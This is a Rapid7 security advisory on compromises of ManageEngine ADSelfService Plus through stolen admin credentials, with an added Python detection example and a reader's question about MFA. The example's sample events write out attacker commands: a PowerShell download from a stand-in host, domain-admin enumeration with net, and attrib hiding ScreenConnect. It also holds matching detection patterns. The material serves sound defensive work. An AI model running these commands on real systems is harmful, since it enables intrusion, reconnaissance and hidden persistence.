Rapid7 Managed
Detection and Response (MDR) recently observed several incidents in which
remote attackers have compromised internet-facing systems running
ManageEngine ADSelfService Plus in managed customer environments. The
attackers used valid ADSelfService Plus admin credentials to gain
system-level access.
Our team is working with the vendor to investigate potential root causes and
determine remediations. We are notifying our customers out of an abundance of
caution so that they may take steps to assess and mitigate risk to their
organizations.
Recommendations:
If your organization uses ManageEngine ADSelfService Plus, we strongly
recommend:
- Changing the “admin” user’s password and enabling multi-factor authentication (MFA) for this account
- Taking the affected systems offline entirely if suspicious activity is observed
What can Rapid7 InsightVM users do to determine their exposure?
InsightVM customers can use Query Builder to find assets running ADSelfService
Plus with the following query: `software.product` `ends with` `ADSelfService Plus`.
Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset
search for `Software name` `contains` `ADSelfService Plus`.
Does InsightIDR detect attacker behavior related to this attack?
Rapid7’s existing detection rules (listed below) are able to identify this
attack. We recommend that you review your settings for these detection rules
and confirm they are turned on and set to an appropriate rule action and
priority for your organization:
- Suspicious Process - Powershell Invoke-WebRequest
- Attacker Technique - Attrib Sets File Or Directory As Hidden And System
- Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command
- Suspicious Process - Zoho ManageEngine Spawns Child
We have also added the following detection rule and prioritized it as
Critical:
- Attacker Technique - Hiding ScreenConnect With Attrib
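As an added illustration, not Rapid7's InsightIDR logic or code, the Python below applies matchers named after the five rules listed above to a handful of constructed process-creation events and reports which rules each event trips. The match conditions, image paths and sample command lines are all assumptions made for this example.

```python
import re
from collections import namedtuple

# One constructed process-creation record (Sysmon event ID 1 style fields).
ProcessEvent = namedtuple("ProcessEvent", "parent_image image command_line")

def _exe(path):  # lower-cased file name of an image path, so rules ignore the directory
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def _has(e, *needles):  # case-insensitive "all of these substrings appear in the command line"
    cl = e.command_line.lower()
    return all(n in cl for n in needles)

# Rule names come from the advisory; the matching conditions are this example's assumptions, not Rapid7's InsightIDR logic.
def powershell_invoke_webrequest(e):
    return _exe(e.image) in {"powershell.exe", "pwsh.exe"} and bool(
        re.search(r"\b(invoke-webrequest|iwr)\b", e.command_line, re.I))
def attrib_hidden_and_system(e):
    return _exe(e.image) == "attrib.exe" and _has(e, "+h", "+s")
def net_enumerates_admins(e):
    return _exe(e.image) in {"net.exe", "net1.exe"} and bool(
        re.search(r"\bgroup\b.*(domain|enterprise) admins", e.command_line, re.I))
def manageengine_spawns_child(e):  # assumed: an ADSelfService Plus process launching a shell or script host
    shells = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
    return "manageengine" in e.parent_image.lower() and _exe(e.image) in shells
def hiding_screenconnect_with_attrib(e):
    return _exe(e.image) == "attrib.exe" and _has(e, "+h", "screenconnect")

RULES = [
    ("Suspicious Process - Powershell Invoke-WebRequest", powershell_invoke_webrequest),
    ("Attacker Technique - Attrib Sets File Or Directory As Hidden And System", attrib_hidden_and_system),
    ("Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command", net_enumerates_admins),
    ("Suspicious Process - Zoho ManageEngine Spawns Child", manageengine_spawns_child),
    ("Attacker Technique - Hiding ScreenConnect With Attrib", hiding_screenconnect_with_attrib),  # Critical
]

def evaluate(event):
    """Return the names of every rule the event satisfies, in RULES order."""
    return [name for name, match in RULES if match(event)]

# Constructed sample telemetry; the last event is a benign PowerShell launch used as a control.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS, 'powershell -nop -c "Invoke-WebRequest -Uri http://example.invalid/x -OutFile C:\\Users\\Public\\x"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\attrib.exe", 'attrib +h +s "C:\\ProgramData\\ScreenConnect Client"'),
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell Get-Process"),
]

def triage(events=SAMPLE_EVENTS):  # map each flagged command line to the rules it trips; clean events are dropped
    return {e.command_line: hits for e in events if (hits := evaluate(e))}
```

Running `triage()` over the sample flags four of the five events; the attrib event trips both attrib rules, which is why the advisory can add the ScreenConnect-specific rule at Critical without the generic one going away.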
Rapid7 detection logic is continuously reviewed to ensure detections are
based on any observed attacker behavior seen by our Incident Response (IR),
Managed Detection and Response (MDR), and Threat Intelligence and Detection
Engineering (TIDE) teams. Through continuous collaboration and threat
landscape monitoring, we ensure product coverage for the latest techniques
being used by malicious actors and will make updates as necessary.
For up-to-date information on this threat, please refer to this article.
Does anyone know how to configure the admin account for MFA like indicated in the article?